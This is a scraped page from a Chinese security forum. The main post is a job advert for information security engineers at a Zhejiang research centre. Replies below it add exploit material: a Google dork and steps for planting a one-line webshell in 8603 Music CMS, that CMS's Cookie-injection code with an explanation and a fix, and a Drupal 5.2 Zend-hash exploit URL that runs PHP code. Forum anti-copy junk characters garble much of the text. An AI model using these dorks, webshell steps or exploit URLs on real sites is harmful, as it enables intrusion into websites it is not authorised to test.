最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 浙江政安信息安全研究中心招贤纳士啦!

  • 招聘职位: 其他职位
  • 公司名称: 浙江政安信息安全研究中心
  • 工作地点: 浙江
  • 专业要求: 计算机专业 
  • 学历要求: 大专
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.sitedirsec.com
  • 简历邮箱: 352113371@qq.com
  • 联系电话: 13000000000
  • 在线QQ: 352113371
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++浙江政安信息安全研究中心相关说明++++++++++

    浙江政安信息安全研究中心招贤纳士啦!+ z+ I0 F, i" w8 Q, S5 m& b
    简历投递:352113371@qq.com9 |+ `, f3 K- ^( _$ _0 W

    ) j+ K  [$ y7 j职位:售前工程师 2名 【7000-15000】
    ; M, A- u4 O3 J5 \3 m( X岗位职责:! {! _3 W% A7 I4 S, q) ^0 `& t
    1、配合销售人员参与信息安全咨询服务及安全服务项目(包括渗透测试、漏洞扫描、APP安全测试、应急响应、安全加固、风险评估、安全规划、安全管理咨询等)的售前工作;, y* H+ F- W! ^0 B
    2、配合销售人员准备与用户的技术交流、PPT等技术文件;  S3 _3 }* }% A2 p! G+ `) j8 z5 q
    3、负责信息安全咨询服务及安全服务的实施工作;. B' k' }; b, k1 [( H/ O
    4、负责信息安全解决方案的售前,对信息安全解决方案项目进行售前技术支持,并协助销售人员跟进项目进度,配合项目的招投标工作(特别是技术方案的编写);
    1 \  K- m& @1 x8 X0 p5、负责信息安全咨询项目的现场调研、资料搜集、课题研究及用户答疑等工作;
    6 O: Y( f; L8 _5 y" J( b任职要求:
    + o$ F; j" r) Y% ^/ ~4 x1、信息安全及计算机相关专业毕业,正规院校大学本科及以上学历。至少2年以上工作经验、有非常好的语言、文字组织能力;
    1 {" i8 r7 I7 C, T2、有较广泛的IT基础知识,熟悉主流应用系统架构,对网络架构、加密认证类设备、网络安全产品深入了解;
    0 |4 u# u6 O9 S9 C: K6 _3、熟悉企业IT规划的方法论和过程;6 B" f+ H! \/ \9 v
    4、为客户提供过信息安全项目策划,具有丰富的信息安全项目策划和实施经验;& E7 O& t5 N: k6 @1 m
    5、熟练掌握ISO27001等国际国内信息安全管理体系有关标准,掌握或从事过风险评估工作;6 ]; {) a/ j' a9 c/ Q3 B% ^* M  _
    6、具有良好的客户沟通能力及技巧;/ K: C" O1 r" L8 e& _+ T: j
    7、能适应经常性短期出差;) l; Z+ y- w& {3 B6 ^/ s& r
    8、具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;/ H6 f' Q& x0 N$ [8 z" c. S

    - n7 L( Y/ N4 g2 _+ f5 c  q+ ~职位:高级信息与网络安全工程师 3名 【5000-25000】
    6 w4 [% R6 k, h' n1 }岗位职责:0 B( Z" K! q, [3 B1 W" Z5 k
        常驻政府单位或国有企业用户现场,根据用户需求提供现场信息与网络安全相关的支持服务,具体内容包括日常安全设备巡检、安全风险事件处理和应急响应、应用系统漏洞扫描和渗透测试、系统安全加固等工作。相关事件要求能形成规范的书面文字材料进行汇报。
    0 ~9 T9 R: }( J3 Y5 K任职条件:: J# f! u- r) z; L& k" y2 C7 n
    1、1-5年以上信息与网络安全相关工作经验。具有CCIE/CISP/CISSP等安全相关证书者优先;具有政府单位、大型企业单位驻场服务经历的优先;最终视工作年限和工作经验确定薪酬。
    * f# b" o$ P6 h  p9 G8 }5 n6 t; i2、熟悉路由器、交换机、防火墙、入侵检测等常见网络安全产品;熟悉windows、linux等操作系统;熟悉常见数据库如Oracle、Sql server、My sql等;
      M/ ~( }3 E5 p2 s3、对信息安全有兴趣和爱好,具有较强的学习能力。如无CISP证书的要求在入职以后3个月内取得证书。有渗透测试和应用开发经历与经验者优先;
    9 A$ ~% W3 H/ M8 R5 _4、有高度的责任心,能适应工作压力;具有较强的沟通协调能力,良好的口头表达和技术文档撰写能力。面试时要求提供3份以上本人撰写的安全相关技术文档和报告材料。7 @; f& s! V4 j; I
    4 `8 Z5 j0 w1 @: |4 v! d
    职位: 安全服务工程师 3名 【5000-15000】. y% n: g! C. u4 E& j6 h
    任职要求:" p$ y" z$ u* Q- m' l+ r
    1. 能力突出者专业学历不限;
    , a3 s7 R' W6 x3 l% [; s2. 对网络安全攻防有浓厚的兴趣并愿意为之倾注大量精力,有较强的工作责任心和主动学习能力;
    $ Z9 m0 r6 S9 N3. 熟练使用PHP、Python、Perl等任意一门编程语言;
    6 X5 p3 r. f9 Q/ o( H4. 掌握MSSQL、MySQL、Oracle、SQLite等一种或几种主流数据库结构以及语法;
    " M4 Z8 s/ m# d' C7 w3 _5 t5. 熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;9 R' o- g' {2 |1 t" j3 r7 Z
    6. 熟悉常见Web漏洞产生的原理,熟悉Windows、Linux平台渗透测试、权限提升、后门分析、安全加固等。
    9 R1 q3 b' d: N& q% E3 ~" ~: H9 ]优先考虑:9 N, Z/ O" W5 W* R- w( W; \. P+ V$ ?
    1.有能够进行项目管理、售前工作者,对具体技术能力可以适当降低+ z* a: g, @, u. J. F
    2.熟悉iOS & Android APP 等移动安全测试5 f# T' Q# q6 f2 F# ~& j8 x
    3.对智能设备、硬件安全测试有了解,熟悉相关常见协议
    : G4 L5 ^7 j6 A3 J) g4.有代码审计相关经验者,具备逆向分析能力更佳;/ y+ R3 _  `- l% H- T
    5. 在漏乌云、洞盒子、补天等漏洞平台提交过相关有效漏洞;4 I, |+ |* N5 v3 c0 t, |2 T1 Z
    6.具有其它可以秒杀面试官能力4 g3 \3 G2 {4 {: ^: @
    7.具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;

     

    您可能还想看的主题:

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

    合优网站管理系统存在SQL注射。。。原创首发~

    启明星辰招聘

    [HR]北京安码科技 信息安全工程师

    [HR]上海四域 信息安全工程师

    《信息安全架构》

    继续信息安全。

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    8603音乐网管理系统v2009.1001漏洞
    8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入
    ! r' m1 W5 ^$ {9 _2 L# m6 ?
    数据库未作任何处理,可以插入一句话。继续插入经典一句话

    8 |! ?8 b8 a5 K4 f. w
    & F5 z1 K# w* h6 L
    Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。数据库地址:/data/%23datalink.asa

    8 k8 s- C% D7 H- U: U+ v- D& u
    二,classid处可以Cookies注入classid=request("classid")set rs1=server.createobject("adodb.recordset")rs1.open "select * from feilei where classid="&classid,conn,1,3classid=rs1("classid")
      q% V9 q8 y6 T5 \* G% A: ^7 l
    这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。

    8 p4 V4 ]# d9 r0 N$ N7 c3 v, s" w
    变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),
    2 h) l) Z8 k$ p" w
    看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.

    . @' M; N9 P+ p' K
    也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注
    " Q% O! j( @+ u
    入也就产生了
    ( S1 u  c& b; |
    用注入中转。

    ) [! \$ U, @+ ^8 @! P: a7 D1 D8 w6 S2 G$ o8 R; J; p2 G# V! I

    5 M8 e# n+ X+ o( [; V! c( j' T( ?; |2 C" f

    * @; Y8 N" C- D2 u& g" v! Z
    5 ^% R. P! N) V2 u5 N# P- E/ B
    6 p: x; @8 _3 y2 k- \8 z4 u
    & H- ^4 Y$ x7 v2 }0 T" G! j, K1 b  S1 E$ d9 I. X+ W6 ~, I
    # Q4 f$ J& i0 @8 L4 W% t" ~6 a

    # T+ H5 a) q7 P" I
    # O) r5 U+ u7 d
    3 N  L/ Y$ y/ m4 Y: S9 ?# I7 \# f' L3 y/ n& k$ A
    & I/ f* l, a  f1 ?7 ?+ o
    * _2 q+ L7 z& N) z; Q
    8 Q( t6 u$ ?  W

    4 d. i. E# l8 @" S/ T: y! R
    : c, {) l* G- z& @( c公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    发贴看看自己积分,呵呵,好像没有楼猪的多。8 \6 N+ P# A7 L2 I! F, T/ a$ f) c
    9 }% ]! d. B% n$ K! T: ?

    ( `7 f% x: i7 f* W( r
    / ~+ z' d( y, W6 h7 e5 ~) m; |* ~+ R! r) g' r7 U! g; j

    ! }0 h" E! L. @; d8 r; N. i
    5 e2 u8 t' F) M" \4 r$ y- X/ D/ |
    ; \% Q4 P9 |1 H. X/ G+ M6 X+ y
      F+ Z4 q/ z; Z" g  ?/ u( n: O: _6 X/ S
    9 c8 A- M: A% D- r! t

    3 K9 h+ I, X% m) d8 H+ L; Q' [1 H

    . z! {: X4 j% q" q2 q, P7 C" ?3 u
    ) d! X/ w$ G. z1 m3 B; }- G

    0 K4 G) X2 h- R( }5 J% w0 u3 M; U" g+ Y
    4 i1 F1 M9 {, Y6 U6 e
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    php的zend哈希漏洞利用问题
    Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation VectorExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&amp;_menu[items][][type]=-1&amp;-312030023=1&amp;q=1/<?phpinfo();4 u+ b9 k( H6 e( V2 s! F
    9 M8 r. V, K2 k9 K: c: Q0 C

    * J4 M% G4 }# U2 Z
    8 z) \9 ^7 \7 c" `  X2 m9 y
    # D( W' x* I; s6 _$ @* L% l
    2 n4 e# ^+ ^$ y' a0 i
    3 H8 `0 _8 J+ z  o  h$ a& `% Y: Z/ V, M3 |

    8 |" N1 m4 V# E" _; {' A+ K0 U* s7 ]" q4 ^0 v
    7 E& _; ~7 a0 s0 v* R

    / Y  G5 ]" h) o% g) N5 C$ x! L0 D1 q; Z' Y5 w1 o' `

    , K, b5 c1 Z- s( z8 O/ F
    4 X# w+ p" S1 i2 [  o, F
    2 P2 e! U3 v0 x& _. B8 g& ?4 B# c6 |( X* l
    8 |3 e- u; O+ a5 J

    3 F# X8 P2 D9 r4 F& s公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表